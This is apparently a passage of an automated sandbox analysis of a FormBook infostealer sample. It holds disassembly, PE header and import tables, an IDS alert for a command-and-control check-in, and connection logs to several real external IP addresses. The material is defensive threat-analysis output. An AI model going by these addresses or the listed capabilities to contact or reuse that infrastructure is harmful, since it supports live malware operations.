                                                            jne 00007F3EBD0F9DFDh
                                                            bt edi, 02h
                                                            jnc 00007F3EBD0F9C6Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007F3EBD0F9C73h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007F3EBD0F9CC5h
                                                            bt esi, 03h
                                                            jnc 00007F3EBD0F9D18h
                                                            movdqa xmm1, dqword ptr [esi+00h]
                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2012 UPD4 build 61030
                                                            • [RES] VS2012 UPD4 build 61030
                                                            • [LNK] VS2012 UPD4 build 61030
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5de54.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x6c4c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xc40000x5de540x5e0001ca665eaf0fd05480a3894b7fbe4b302False0.9297264586103723data7.8986657316669895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x1220000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                            RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                            RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                            RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                            RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                            RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                            RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                            RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                            RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                            RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                            RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                            RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                            RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                            RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                            RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                            RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                            RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                            RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                            RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                            RT_RCDATA0xcc7b80x55159data1.000332850317786
                                                            RT_GROUP_ICON0x1219140x76dataEnglishGreat Britain0.6610169491525424
                                                            RT_GROUP_ICON0x12198c0x14dataEnglishGreat Britain1.25
                                                            RT_GROUP_ICON0x1219a00x14dataEnglishGreat Britain1.15
                                                            RT_GROUP_ICON0x1219b40x14dataEnglishGreat Britain1.25
                                                            RT_VERSION0x1219c80xdcdataEnglishGreat Britain0.6181818181818182
                                                            RT_MANIFEST0x121aa40x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                            DLLImport
                                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                            PSAPI.DLLGetProcessMemoryInfo
                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                            UxTheme.dllIsThemeActive
                                                            KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                            GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                            ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                            OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishGreat Britain
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-20T21:09:18.080157+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.549793134.0.14.15880TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 20, 2024 21:08:56.283144951 CET4974880192.168.2.5104.21.36.62
                                                            Nov 20, 2024 21:08:56.409650087 CET8049748104.21.36.62192.168.2.5
                                                            Nov 20, 2024 21:08:56.409729958 CET4974880192.168.2.5104.21.36.62
                                                            Nov 20, 2024 21:08:56.420675993 CET4974880192.168.2.5104.21.36.62
                                                            Nov 20, 2024 21:08:56.540532112 CET8049748104.21.36.62192.168.2.5
                                                            Nov 20, 2024 21:08:57.827461958 CET8049748104.21.36.62192.168.2.5
                                                            Nov 20, 2024 21:08:57.829482079 CET8049748104.21.36.62192.168.2.5
                                                            Nov 20, 2024 21:08:57.829586029 CET4974880192.168.2.5104.21.36.62
                                                            Nov 20, 2024 21:08:57.831001997 CET4974880192.168.2.5104.21.36.62
                                                            Nov 20, 2024 21:08:57.951231956 CET8049748104.21.36.62192.168.2.5
                                                            Nov 20, 2024 21:09:13.775938988 CET4978680192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:13.898364067 CET8049786134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:13.898552895 CET4978680192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:13.912570000 CET4978680192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:14.032305002 CET8049786134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:15.423902988 CET4978680192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:15.545147896 CET8049786134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:15.545303106 CET4978680192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:16.442800999 CET4979380192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:16.562449932 CET8049793134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:16.562608957 CET4979380192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:16.578704119 CET4979380192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:16.698941946 CET8049793134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:18.080157042 CET4979380192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:18.200241089 CET8049793134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:18.200352907 CET4979380192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:19.099975109 CET4980080192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:19.220084906 CET8049800134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:19.220343113 CET4980080192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:19.239890099 CET4980080192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:19.359555006 CET8049800134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:19.359569073 CET8049800134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:20.752257109 CET4980080192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:20.872108936 CET8049800134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:20.872189999 CET4980080192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:21.770612955 CET4980980192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:21.890239954 CET8049809134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:21.890402079 CET4980980192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:21.907308102 CET4980980192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:22.026916981 CET8049809134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:23.856789112 CET8049809134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:23.857790947 CET8049809134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:23.857858896 CET4980980192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:23.859570026 CET4980980192.168.2.5134.0.14.158
                                                            Nov 20, 2024 21:09:23.979166985 CET8049809134.0.14.158192.168.2.5
                                                            Nov 20, 2024 21:09:30.055856943 CET4982780192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:30.175376892 CET8049827103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:30.175460100 CET4982780192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:30.190546989 CET4982780192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:30.310163021 CET8049827103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:31.501651049 CET8049827103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:31.501943111 CET8049827103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:31.501996994 CET4982780192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:31.705168009 CET4982780192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:32.723689079 CET4983380192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:32.846223116 CET8049833103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:32.846373081 CET4983380192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:32.860496998 CET4983380192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:32.982027054 CET8049833103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:34.202760935 CET8049833103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:34.202847958 CET8049833103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:34.202907085 CET4983380192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:34.377079010 CET4983380192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:35.397093058 CET4984080192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:35.516627073 CET8049840103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:35.516757011 CET4984080192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:35.532941103 CET4984080192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:35.652966976 CET8049840103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:35.652980089 CET8049840103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:36.800163031 CET8049840103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:36.800493002 CET8049840103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:36.800556898 CET4984080192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:37.052212954 CET4984080192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:38.080327988 CET4984880192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:38.204550028 CET8049848103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:38.204636097 CET4984880192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:38.215993881 CET4984880192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:38.462388992 CET8049848103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:39.625582933 CET8049848103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:39.625896931 CET8049848103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:39.625926018 CET8049848103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:39.626030922 CET4984880192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:39.627827883 CET4984880192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:39.659868002 CET4984880192.168.2.5103.224.182.242
                                                            Nov 20, 2024 21:09:39.779561996 CET8049848103.224.182.242192.168.2.5
                                                            Nov 20, 2024 21:09:45.355138063 CET4986480192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:45.474678993 CET8049864185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:45.474761963 CET4986480192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:45.490627050 CET4986480192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:45.610964060 CET8049864185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:46.725544930 CET8049864185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:46.725676060 CET8049864185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:46.725729942 CET4986480192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:47.002017021 CET4986480192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:48.020589113 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:48.143692970 CET8049872185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:48.143912077 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:48.157494068 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:48.277725935 CET8049872185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:49.441334963 CET8049872185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:49.441622972 CET8049872185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:49.441694975 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:49.673989058 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:50.692974091 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:50.813019991 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:50.813252926 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:50.828082085 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:50.947951078 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:50.948343039 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:52.156817913 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:52.156831026 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:52.156902075 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:52.330528975 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:53.349910975 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:53.469712019 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:53.469860077 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:53.479079008 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:53.603178978 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:54.725383997 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:54.725578070 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:54.725649118 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:54.728315115 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:54.847798109 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:10:00.591939926 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:00.711524010 CET8049899106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:00.711637020 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:00.725912094 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:00.845474005 CET8049899106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:02.236413956 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:02.356267929 CET8049899106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:02.356355906 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:03.255213022 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:03.374907017 CET8049905106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:03.375171900 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:03.389355898 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:03.508985996 CET8049905106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:04.892827034 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:05.012904882 CET8049905106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:05.013066053 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:05.912861109 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:06.032916069 CET8049913106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:06.033025026 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:06.054174900 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:06.173851967 CET8049913106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:06.174092054 CET8049913106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:07.564764977 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:07.684983015 CET8049913106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:07.685033083 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:08.586325884 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:08.706018925 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:08.706108093 CET4992080192.168.2.5106.15.109.33
